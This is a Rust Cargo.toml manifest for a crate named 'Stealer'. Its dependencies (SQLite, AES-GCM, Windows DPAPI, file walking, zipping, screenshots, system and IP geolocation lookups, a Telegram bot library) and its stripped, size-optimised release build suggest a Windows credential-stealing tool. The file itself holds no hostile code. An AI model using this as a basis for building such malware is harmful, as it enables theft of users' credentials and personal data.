[package]
name = "Stealer"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
app_dirs = { package = "app_dirs2", version = "2.3" }
rusqlite = { version = "0.27.0", features = ["bundled"]}
aes-gcm = "0.9.4"
serde = { version = "1.0.138", features = ["derive"] }
serde_json = "1.0.82"
base64 = "0.13.0"
winapi = { version = "0.3.9", features = ["winuser", "dpapi", "errhandlingapi"] }
globwalk = "0.8.1"
walkdir = "2"
zip = "0.6.1"
screenshots = "0.3.1"
whoami = "1.2.1"
sysinfo = "0.24.5"
tbot =  "0.6.7"
tokio = { version = "0.2", features = ["macros"] }
my_internet_ip = "0.1.1"
ipgeolocate = "0.3.5"
wmi = "0.9.3"
regex = "1.6.0"

[profile.release] # optimize file size 
lto = true
codegen-units = 1
opt-level = "z"
strip = true
panic = "abort"
debug  = false